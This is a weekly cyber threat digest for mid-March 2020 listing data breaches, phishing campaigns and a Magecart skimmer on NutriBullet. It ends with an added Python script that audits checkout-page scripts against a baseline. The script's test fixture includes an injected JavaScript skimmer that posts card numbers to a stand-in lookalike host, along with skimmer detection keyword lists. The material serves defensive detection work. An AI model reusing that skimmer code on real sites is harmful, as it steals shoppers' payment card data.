
Threat Summary: 13 – 19 March 2020


Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source (ranked by 7-day heat):
  • VMware Workstation
  • Microsoft SMBv3
  • Trend Micro Apex One
  • cPanel
  • Gentoo Linux

Deep & Dark Web (ranked by 7-day heat):
  • cPanel
  • Microsoft Office 365
  • Microsoft .NET Framework
  • Google Play
  • VirtualEnv

The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.

Data Leaks & Breaches

Open Exchange Rates (UK): Open Exchange Rates discovered that an unauthorised individual had gained access to the company’s network, and to a database containing user information, following a security breach at one of its third-party IT providers. Potentially stolen data included names, email addresses, encrypted or hashed passwords, IP addresses, personal and/or business names and addresses, country of residence, and website address. App IDs (API keys) were also exposed, and users are advised to generate new ones. Affected: Unknown

Northeast Radiology (US): On January 11th, 2020, Northeast Radiology was informed by its managed service provider Alliance Healthcare that unauthorised individuals had accessed Northeast Radiology’s picture archiving and communication system (PACS). The exposed information includes names, genders, dates of birth, medical record numbers, and more. In some cases the medical record number may have been the patient’s Social Security number. Affected: 29

Skolaro (India): Security researcher Roni Suchowski discovered an unsecured server belonging to the online school management platform Skolaro. The database contained over 130,000 user IDs and passwords belonging to present or former users, as well as medical records, photos, passport scans, and more. Affected: >50,000

Aerial Direct (UK): Telecommunications service provider Aerial Direct notified customers that an unknown unauthorised third party accessed an external backup database on February 26th, 2020. The database contained the data of current and expired subscribers from the last six years. Details exposed in the breach include names, dates of birth, phone numbers, email addresses, and more. The company stated that no financial information or passwords were exposed. Affected: Unknown

Blisk (Estonia): Researchers at Security Discovery identified an exposed Elasticsearch database over 3.4GB in size. It contained IP addresses, User-Agent strings, and email addresses. The researchers stated that the database appears to show that the Blisk browser was collecting data and bypassing user security measures. The researchers discovered the database on December 2nd, 2019, and Blisk closed the exposure on December 9th, 2019. Affected: Unknown

AffordaCare (US): Maze ransomware operators uploaded data from the Texas-based AffordaCare clinic, claiming to have stolen a total of 40GB in an attack that occurred on February 1st, 2020. According to the operators, AffordaCare failed to pay the demanded ransom. The uploaded files include patient insurance claim forms, workers’ compensation documentation, employee payroll information, and more. Exposed data includes patients’ full names, Social Security numbers, dates of birth, diagnosis codes, patient addresses, billing information, and more. Affected: Unknown

Advanced Urgent Care of the Florida Keys (US): Data belonging to Advanced Urgent Care of the Florida Keys was discovered on a Russian-language forum. According to the poster, the clinic had refused to pay, indicating that ransomware was involved in the attack. It remains unclear who was behind the attack. The data dump contains patients’ personal information, mostly scans of reports with handwritten notes and results. It includes protected health information as well as billing information such as first and last names, phone numbers, email addresses, and co-pay status on bills. The data appears to have been exfiltrated on or around March 1st, 2020. Affected: >14,000

Randleman Eye Center (US): On January 13th, 2020, Randleman Eye Center discovered that certain files on its systems had been encrypted by malware, including a server containing patients’ protected health information. The attack occurred on or around January 10th, 2020. Potentially exposed data includes patients’ first and last names, dates of birth, gender, and digital retinal images. No evidence was found to suggest that the data had been stolen in the attack. Affected: Unknown

College of DuPage (US): The College of DuPage is informing its employees of a data breach that may have exposed their personal and tax information. The breach concerns the 2018 W-2 forms of 1,755 current and former employees. The college does not believe the data has been stolen or used for fraudulent purposes. Affected: 1,755

Wichita State University (US): WSU reported that between December 3rd and December 5th, 2019, an unauthorised party accessed a server that the university used to operate student and employee web portals. The accessible data included names, email addresses, dates of birth, and Social Security numbers. WSU began to notify impacted parties on March 6th, 2020. Affected: 1,762

Advantage Capital Funding and Argus Capital Funding (US): Researchers at vpnMentor discovered an exposed database that appears to be linked to MCA Wizard, an app developed by the two companies. The database, 425GB in size, contained over 500,000 documents, including credit reports, bank statements, contracts, legal paperwork, driver’s licences, Social Security information, and more. The breach affects both companies, as well as their customers, clients, contractors, employees and partners. Affected: Unknown

TrueFire (US): TrueFire notified customers that an unauthorised party gained access to its website and captured customer data as it was being entered. The breach, which occurred between August 3rd, 2019, and January 14th, 2020, exposed customers’ names, addresses, payment card account numbers, security codes, and card expiration dates. Affected: Unknown

This table shows a selection of leaks and breaches reported this week; the "Affected" figure is the number of individuals reported as impacted where known.

Malware Mentions in relation to the Coronavirus Outbreak

This chart shows the trending malware related to the Coronavirus Outbreak over the last week.

Weekly Industry View

Banking & Finance: Cofense researchers discovered a new phishing scam targeting customers of the African financial services group ABSA. The phishing email consists of plain text informing the customer of pending transfers from another bank account, and does not attempt to imitate legitimate ABSA communication. Victims are asked to download and open an .htm attachment that redirects them to a fake ABSA online banking portal. The portal is hosted on a hijacked domain belonging to the Pakistani education activist Ahmed Nawaz and looks almost identical to the real ABSA portal.

Government: The US Department of Health and Human Services (HHS) was hit by what is described as a ‘campaign of disruption and disinformation’, believed to have been carried out by a foreign threat actor. HHS servers were hit millions of times over several hours in an attempt to slow its systems down, which reportedly failed. In a tweet on March 15th, 2020, the National Security Council warned of fake messages claiming that the government was planning a two-week mandatory quarantine for the entire country. This message, spread via text, email and social media, is believed to be related to the attack on HHS.

Education: Abnormal Security reported that threat actors were taking advantage of the confusion surrounding the operational status of higher education institutions in order to obtain user login details. Attackers sent an email to between 10,000 and 20,000 users which purported to be from university health teams. The researchers did not disclose the names of the targeted institutions. The message contained a link that redirected to a phishing site disguised as an Office 365 login page.

Retail, Hospitality & Tourism: Researchers at RiskIQ discovered a JavaScript skimmer on NutriBullet’s website on February 20th, 2020, which they attributed to Magecart Group 8. Although RiskIQ had the exfiltration domain taken down and the skimmer was removed on March 1st, 2020, a new skimmer was placed on the website on March 5th and again on March 10th, 2020. The researchers believe the threat actors themselves removed the first skimmer following the domain takedown. The third skimmer was added after the group’s replacement domain had already been taken down. The researchers note that NutriBullet failed to respond to multiple attempts at contact, meaning that re-infection could continue until NutriBullet secures its infrastructure, and they advise against making any purchases on the site at present. NutriBullet has since confirmed the skimmer attack and implemented new security measures after Forbes reached out regarding the risk on March 17th, 2020.

Healthcare: The University Hospital in Brno, which hosts one of 18 Czech laboratories testing for coronavirus, was hit by a cyberattack on March 13th, 2020. It is unclear what type of malware was involved. According to the director of the hospital, its computer systems started ‘falling gradually’ and had to be shut down.

News and information concerning each mentioned industry over the last week.
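The NutriBullet case above shows why a one-off takedown is not enough: as long as the site owner's infrastructure stays compromised, the skimmer is simply re-planted with a new exfiltration domain. The practical control on the site owner's side is a recurring script inventory of the checkout page, diffed against a baseline. The following is an added example, not code from Silobreaker or RiskIQ, of such a check in Python using only the standard library. The page HTML, the approved-host allow-list, the baseline inline-script hashes and the lookalike hostnames are all constructed for this example; the skimmer heuristic (card-field names combined with an outbound send primitive) is a simple illustration, not a description of the actual Magecart Group 8 code.

```python
"""Baseline diff of <script> elements on a checkout page to catch re-injected skimmers.

Added example (not Silobreaker's or RiskIQ's code). All hostnames, pages and
hashes below are constructed for the example.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allow-list of hosts the shop is expected to load scripts from.
APPROVED_HOSTS = {"cdn.example-shop.test", "js.example-payments.test"}

# Inline script that is part of the legitimate page; its hash forms the baseline.
KNOWN_INLINE = "window.dataLayer = window.dataLayer || [];"

# Heuristic indicators: a script that reads card fields AND sends data somewhere.
SKIMMER_FIELD_HINTS = ("cc_number", "cardnumber", "card_number", "cvv", "cvc", "expiry")
SKIMMER_SEND_HINTS = ("fetch(", "xmlhttprequest", "sendbeacon", "new image(", ".src=")


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


BASELINE_HASHES = {sha256_hex(KNOWN_INLINE)}


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from an HTML document."""

    def __init__(self) -> None:
        super().__init__()
        self.external: list[str] = []
        self.inline: list[str] = []
        self._in_script = False
        self._buf: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> content raw through handle_data.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def looks_like_skimmer(body: str) -> bool:
    low = body.lower()
    return any(f in low for f in SKIMMER_FIELD_HINTS) and any(s in low for s in SKIMMER_SEND_HINTS)


def audit(html: str, baseline_hashes: set, approved_hosts: set) -> list:
    """Return (kind, detail) findings for scripts not covered by the baseline."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname or ""
        if host not in approved_hosts:
            findings.append(("unapproved-host", src))
    for body in parser.inline:
        digest = sha256_hex(body.strip())
        if digest in baseline_hashes:
            continue
        findings.append(("unknown-inline", digest))
        if looks_like_skimmer(body):
            findings.append(("skimmer-indicators", digest))
    return findings


# Constructed sample pages: the clean baseline page and the same page after injection.
CLEAN_PAGE = (
    '<html><head>\n'
    '<script src="https://cdn.example-shop.test/app.js"></script>\n'
    '<script>\n  ' + KNOWN_INLINE + '\n</script>\n'
    '</head><body><form><input name="cc_number"></form></body></html>'
)

SKIMMER_INJECT = (
    '<script src="https://static.example-cdn-lookalike.test/jquery.min.js"></script>\n'
    '<script>\n'
    "  document.querySelector('form').addEventListener('submit', function () {\n"
    "    var d = {n: document.querySelector('input[name=cc_number]').value};\n"
    "    fetch('https://stats.example-cdn-lookalike.test/g', {method: 'POST', body: JSON.stringify(d)});\n"
    '  });\n'
    '</script>\n'
)
INFECTED_PAGE = CLEAN_PAGE.replace("</head>", SKIMMER_INJECT + "</head>")

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, audit(page, BASELINE_HASHES, APPROVED_HOSTS))
```

Run on a schedule against the live checkout page, any "unapproved-host" or "unknown-inline" finding is a change that someone must explain; the "skimmer-indicators" tag only prioritises triage. Because the check is keyed on hashes and hosts rather than on a known-bad domain, it still fires after the attackers rotate to a fresh exfiltration domain, which is exactly the gap the takedown-only response left open.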

The Silobreaker Team
